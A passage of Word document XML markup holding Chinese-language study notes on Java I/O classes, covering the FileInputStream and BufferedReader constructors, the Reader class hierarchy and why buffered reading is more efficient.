          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，该文件通过文件系统中的</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> File </w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>对象</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> file </w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>指定。</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>FileInputStream (FileDescriptor  fdObj) </w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">          </w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>通过使用文件描述符</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> fdObj </w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>创建一个</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> FileInputStream </w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，该文件描述符表示到文件系统中某个实际文件的现有连接。</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>FileInputStream (String  name) </w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">          </w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>通过打开一个到实际文件的连接来创建一个</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> FileInputStream </w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，该文件通过文件系统中的路径名</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> name </w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>指定。</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Reader</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>   |——BufferedReader </w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>   |___InputStreamReader </w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>         |__FileReader </w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">BufferedReader : </w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>从字符输入流中读取文本，缓冲各个字符，从而实现字符、数组和行的高效读取。</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>构造方法摘要</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>BufferedReader (Reader  in) </w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">          </w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>创建一个使用默认大小输入缓冲区的缓冲字符输入流。</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>BufferedReader (Reader  in, int sz) </w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">          </w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>创建一个使用指定大小输入缓冲区的缓冲字符输入流。</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>BufferedReader (Java Platform SE 6) </w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>BufferedReader</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>的最大特点就是缓冲区的设置。通常</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">Reader </w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>所作的每个读取请求都会导致对底层字符或字节流进行相应的读取请求，</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>如果没有缓冲，则每次调用</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> read() </w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> readLine() </w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>都会导致从文件中读取字节，并将其转换为字符后返回，而这是极其低效的。</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>BufferedReader</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>可以指定缓冲区的大小，或者可使用默认的大小。大多数情况下，默认值就足够大了。</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>因此，建议用</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> BufferedReader </w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>包装所有其</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> read() </w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>操作可能开销很高的</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> Reader</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>（如</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> FileReader </w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>InputStreamReader</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>）。例如，</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> BufferedReader in</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
